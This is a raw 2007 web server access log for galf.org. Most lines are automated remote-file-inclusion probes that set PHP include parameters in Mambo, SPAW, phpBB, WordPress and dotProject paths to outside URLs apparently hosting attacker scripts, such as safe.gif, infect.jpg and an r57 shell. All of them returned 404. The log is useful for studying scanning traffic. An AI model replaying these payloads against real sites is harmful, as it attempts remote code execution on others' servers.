206.225.86.155 - - [07/Oct/2007:17:33:08 -0700] "GET /logs/access_070827.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:33:13 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:33:14 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:33:14 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.6.23.16 - - [07/Oct/2007:17:33:34 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.124.198.61 - - [07/Oct/2007:17:33:35 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [07/Oct/2007:17:33:35 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.171.113.59 - - [07/Oct/2007:17:33:51 -0700] "GET /logs/access_070826.log/includes/dbal.php?eqdkp_root_path=http://creation.g-nova.fr/asprofirst/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:34:02 -0700] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:34:08 -0700] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:17:34:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:17:34:52 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:35:17 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:35:18 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:35:24 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:35:24 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:36:18 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:17:36:28 -0700] "GET /logs/access_070820.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
74.124.198.61 - - [07/Oct/2007:17:37:14 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [07/Oct/2007:17:37:14 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:37:21 -0700] "GET /logs/access_070618.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [07/Oct/2007:17:37:38 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:37:38 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:37:47 -0700] "GET /logs/access_070820.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:38:16 -0700] "GET /logs/access_070827.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.37.212.106 - - [07/Oct/2007:17:38:16 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:38:16 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:38:28 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:39:06 -0700] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
71.240.124.170 - - [07/Oct/2007:17:39:28 -0700] "GET /index.php?inc=http://www.catim.com/legislacao/suntik/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:39:45 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:17:39:45 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
72.37.212.106 - - [07/Oct/2007:17:39:47 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.37.212.106 - - [07/Oct/2007:17:39:47 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:40:29 -0700] "GET /logs/access_070910.log//dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:41:12 -0700] "GET /logs/access_070716.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:17:41:12 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:17:41:12 -0700] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
72.37.212.106 - - [07/Oct/2007:17:41:17 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:41:47 -0700] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:41:48 -0700] "GET /logs/access_070820.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.226.137 - - [07/Oct/2007:17:41:48 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:41:59 -0700] "GET /logs/access.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
72.37.212.106 - - [07/Oct/2007:17:42:49 -0700] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.37.212.106 - - [07/Oct/2007:17:42:56 -0700] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.239.140.2 - - [07/Oct/2007:17:43:12 -0700] "GET /logs//public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.140.2 - - [07/Oct/2007:17:43:12 -0700] "GET //public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:43:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:43:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [07/Oct/2007:17:45:30 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:45:30 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:45:31 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:45:49 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:17:45:58 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
72.0.130.226 - - [07/Oct/2007:17:46:03 -0700] "GET /logs/access_070702.log//dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
74.124.198.61 - - [07/Oct/2007:17:46:04 -0700] "GET /logs/access_070820.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:46:05 -0700] "GET /logs/access_070910.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
212.88.183.189 - - [07/Oct/2007:17:46:10 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [07/Oct/2007:17:46:10 -0700] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [07/Oct/2007:17:46:12 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:46:14 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:46:14 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.88.183.189 - - [07/Oct/2007:17:46:42 -0700] "GET /logs/access_070625.log//tools/send_reminders.php?noSet=0&includedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [07/Oct/2007:17:46:47 -0700] "GET /logs/access_070618.log//tools/send_reminders.php?noSet=0&includedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:47:27 -0700] "GET /logs/access_070826.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:47:52 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:48:24 -0700] "GET /logs/access_070820.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:48:44 -0700] "GET /logs/access_070827.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:48:44 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:48:45 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:05 -0700] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:05 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.92.85.234 - - [07/Oct/2007:17:49:06 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:07 -0700] "GET /logs/access_070910.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:14 -0700] "GET /logs/access_070827.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:15 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:19 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:30 -0700] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:49:38 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
206.225.86.155 - - [07/Oct/2007:17:50:31 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:50:31 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
213.239.140.2 - - [07/Oct/2007:17:50:46 -0700] "GET /logs/access_070827.log//public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
85.17.186.161 - - [07/Oct/2007:17:50:50 -0700] "POST /logs/access_070409.log?t= HTTP/1.1" 405 3319 "http://www.galf.org/logs/access_070409.log?t=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
74.222.3.125 - - [07/Oct/2007:17:50:54 -0700] "GET /logs/access_070409.log?t=&postorder=desc HTTP/1.1" 200 227844 "-" "-" "www.galf.org"
200.203.122.135 - - [07/Oct/2007:17:52:23 -0700] "GET /logs/access_070826.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
87.106.42.129 - - [07/Oct/2007:17:52:23 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:52:37 -0700] "GET /logs/access_070910.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:53:54 -0700] "GET /logs/access_070618.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
71.240.124.170 - - [07/Oct/2007:17:54:14 -0700] "GET /index.php?inc=http://www.catim.com/legislacao/suntik/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:55:58 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:55:58 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:56:06 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:56:39 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:56:41 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:56:44 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:57:22 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:57:22 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:57:58 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:57:58 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.97.178.20 - - [07/Oct/2007:17:59:48 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.97.178.20 - - [07/Oct/2007:17:59:48 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:00:05 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.72.112.158 - - [07/Oct/2007:18:00:09 -0700] "GET /logs/index.php?p=http://rhama.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.158 - - [07/Oct/2007:18:00:09 -0700] "GET /index.php?p=http://rhama.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:00:35 -0700] "GET /logs/access_070910.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:00:45 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:00:45 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:00:46 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.112.158 - - [07/Oct/2007:18:00:50 -0700] "GET /logs/index.php?go=http://rhama.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
64.72.112.158 - - [07/Oct/2007:18:00:50 -0700] "GET /index.php?go=http://rhama.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:00:58 -0700] "GET /logs/access_070910.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:18:01:22 -0700] "GET /logs/index.php?pag=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
